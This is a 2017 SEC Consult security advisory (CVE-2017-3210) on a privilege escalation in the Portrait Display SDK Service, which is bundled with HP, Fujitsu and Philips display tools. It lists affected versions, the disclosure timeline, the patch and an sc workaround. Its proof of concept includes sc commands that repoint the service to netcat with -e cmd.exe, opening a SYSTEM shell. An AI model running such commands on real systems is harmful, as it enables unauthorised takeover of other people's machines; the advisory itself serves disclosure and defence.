Privilege Escalation due to insecure service configuration

SEC Consult Vulnerability Lab Security Advisory < 20170425-0 >

=======================================================================

title: Privilege Escalation due to insecure service configuration

product: Portrait Display SDK Service

vulnerable version: mutliple, see PoC

fixed version: multiple, see solution

CVE number: CVE-2017-3210

impact: critical

homepage: www.portrait.com

found: 2017-02-23

by: W. Schober (Office Vienna)

SEC Consult Vulnerability Lab

An integrated part of SEC Consult

Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow

Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

www.sec-consult.com

=======================================================================

Vendor description:

-------------------

"For nearly 20 years, Portrait Displays has provided customized software to

OEM monitor manufacturers across the globe. We develop tailored solutions,

encompassing the needs of today’s changing marketplace.

Our technologies allow OEMs to provide their end users with a premium

interactive experience. Our engineers work hand-in-hand with leading OEMS,

ODMs, and GPU and scaler companies, to develop and implement cutting-edge

software solutions."

Source: www.portrait.com/technology.html

 

Business recommendation:

------------------------

SEC Consult recommends not to use this service in a production environment

until a thorough security review has been performed by security professionals

and all identified issues have been resolved.

 

Vulnerability overview/description:

-----------------------------------

The Portrait Display SDK Service (PdiService.exe) configuration was found to

be writable for every authenticated user in a default installation. This would

allow an attacker to execute arbitrary code, elevate his privileges and gain a

shell with the privileges of the SYSTEM user.

The Portrait Display SDK Service is used in various different OEM software,

which is shipped per default on a wide range of notebooks. The software, where

the SDK is included is used as an virtual OSD (On Screen Display) for "tuning"

displays, setting gamma values, changing color values etc.

The vulnerability was identified in the software "DisplayView Click" from

Fujitsu. Due to the fact, that this SDK is used in several software packages,

SEC Consult tried to identify other potential vulnerable software packages,

which got rebranded by Portrait Displays, Inc. The following list contains an

excerpt of packages containing the SDK, which are partially installed per default on

notebooks of HP, Philips,Fujitsu, etc.

 

-) Fujitsu DisplayView Click v5

-) Fujitsu DisplayView Click v6

-) HP Display Assistant

-) HP Display Control

-) HP Mobile Display Assistant v1

-) HP Mobile Display Assistant v2

-) HP My Display

-) HP My Display All-In-One/TouchSmart

-) HP Picture in Picture

-) Philips SmartControl II

-) Philips SmartControl Lite

-) Philips SmartControl Premium

 

Portait Displays Inc. confirmed that at least the following packages are

vulnerable:

Fujitsu DisplayView Click

Version 6.0 build id: dtune-fts-R2014-04-22-1630-07, 6.01

build id: dtune-fts-R2014-05-13-1436-35

The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51

Fujitsu DisplayView Click Suite Version 5

build id: dtune-fus-R2012-09-26-1056-32

The issue is addressed by patch in Version 5.9 build id: dtune-fus-R2017-04-01-1212-32

HP Display Assistant Version 2.1

build id: dtune-hwp-R2012-10-31-1329-38

The issue was fixed in Version 2.11 build id: dtune-hwp-R2013-10-11-1504-22 and above

HP My Display Version 2.01

build id: dtune-hpc-R2013-01-10-1507-17

The issue was fixed in Version 2.1 build id: dtune-hpc-R2014-06-27-1655-15 and above

Philips Smart Control Premium

Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13, 2.25

build id: dtune-plp-R2014-08-29-1016-05

The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07

Furthermore, a more detailed summary of this advisory has been published at our

blog: blog.sec-consult.com/2017/04/what-unites-hp-philips-and-fujitsu-one.html

Proof of concept:

-----------------

To identify the permissions of the service the builtin Windows command "sc" was

used. The output of the command for the vulnerable service can be seen below:

(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)

(A;;CCLCSWRPWPDTLOCRRC;;;SY)

(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)

(A;;CCLCSWLOCRRC;;;IU)

(A;;CCLCSWLOCRRC;;;SU)

By "converting" the Security Descriptor Definition Language into human readable

words, SEC Consult was able to identify the following permissions for the

PdiService:

RW NT AUTHORITY\Authenticated Users

RW NT AUTHORITY\SYSTEM

RW BUILTIN\Administrators

R NT AUTHORITY\INTERACTIVE

R NT AUTHORITY\SERVICE

Due to the fact, that every authenticated user has write access on the service,

an attacker is able to execute arbitrary code by changing the services binary

path. Moreover, all Windows services are executed with SYSTEM permissions,

resulting in privilege escalation.

The workflow to execute arbitrary code is as follows:

1) Stop Service

sc stop pdiservice

2) Alter service binary path

sc config pdiservice binpath= "C:\nc.exe -nv 127.0.0.1 4242 -e C:\WINDOWS\System32\cmd.exe"

3) Start Service

sc start pdiservice

 

Vulnerable / tested versions:

-----------------------------

The following list contains all vulnerable versions:

Fujitsu DisplayView Click

Version 6.0 build id: dtune-fts-R2014-04-22-1630-07, 6.01

build id: dtune-fts-R2014-05-13-1436-35

The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51

Fujitsu DisplayView Click Suite Version 5

build id: dtune-fus-R2012-09-26-1056-32

The issue is addressed by patch in Version 5.9 build id: dtune-fus-R2017-04-01-1212-32

HP Display Assistant Version 2.1

build id: dtune-hwp-R2012-10-31-1329-38

The issue was fixed in Version 2.11 build id: dtune-hwp-R2013-10-11-1504-22 and above

HP My Display Version 2.01

build id: dtune-hpc-R2013-01-10-1507-17

The issue was fixed in Version 2.1 build id: dtune-hpc-R2014-06-27-1655-15 and above

Philips Smart Control Premium

Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13, 2.25

build id: dtune-plp-R2014-08-29-1016-05

The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07

 

Vendor contact timeline:

------------------------

2017-03-01: Contacting vendor through email sales@portrait.com

2017-03-01: Informing CERT/CC, asking for coordination support regarding HW

vendors, assigned VU#219739

2017-03-01: The vendor responds and requests all attachments as plaintext in

the email body because they are not allowed to open any attachements

from "unknown parties".

Therefore SEC Consult sends the PGP Public Keys as plaintext in the

body of the email.

2017-03-08: Contacting vendor again on how to transmit the advisory; no answer

2017-03-15: Informing CERT/CC about the status, asking for support to contact

the vendor

2017-03-16: The Vendor provides a public key for encrypted communication;

The advisory got securely transmitted to the vendor.

2017-03-18: The vendor responds and confirms that they were able to reproduce

the vulnerability. Detailed information, on which Brands are

affected, as well as a timeline for an update will be provided next

week.

2017-03-28: Requesting update from Portrait Displays Inc. Asking about current

state and a list of affected vendors.

2017-03-29: Vendors responds that they are still in the process of evaluating

on, which 3rd parties are affected.

2017-04-06: Vendor updates us with information about the planed release schedule

and affected vendors. Portrait is still in the progress of

evaluating on, which3rd parties are affected. The list should be

available at the end of the week. A patch that removes the invalid

permission will be available on the vendors website.

2017-04-17: Vendor provides us with a detailed list of affected products.

2017-04-18: Vendor publicly releases a patch for the vulnerability on their

website (http://www.portrait.com/securityupdate.html)

2017-04-21: SEC Consult requests a CVE from CERT/CC and coordinates the

disclosure of the CERT VU and the SEC Consult advisory.

2017-04-25: Public release.

Solution:

---------

Since the 18th of April 2017 a patch is available.

See: www.portrait.com/securityupdate.html

Workaround:

-----------

To quickly get rid of the vulnerability, the permissions of the service should

be altered with the built-in windows command "sc". To completely remove the

permissions of the "Authenticated Users" group, the following command can be

used:

sc sdset pdiservice D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)

(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)

This will result in the following set of permissions:

RW NT AUTHORITY\SYSTEM

RW BUILTIN\Administrators

R NT AUTHORITY\INTERACTIVE

R NT AUTHORITY\SERVICE

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult

Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow

Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab

The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It

ensures the continued knowledge gain of SEC Consult in the field of network

and application security to stay ahead of the attacker. The SEC Consult

Vulnerability Lab supports high-quality penetration testing and the evaluation

of new offensive and defensive technologies for our customers. Hence our

customers obtain the most current information about vulnerabilities and valid

recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interested to work with the experts of SEC Consult?

Send us your application www.sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?

Contact our local offices www.sec-consult.com/contact/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

EOF W. Schober / @2017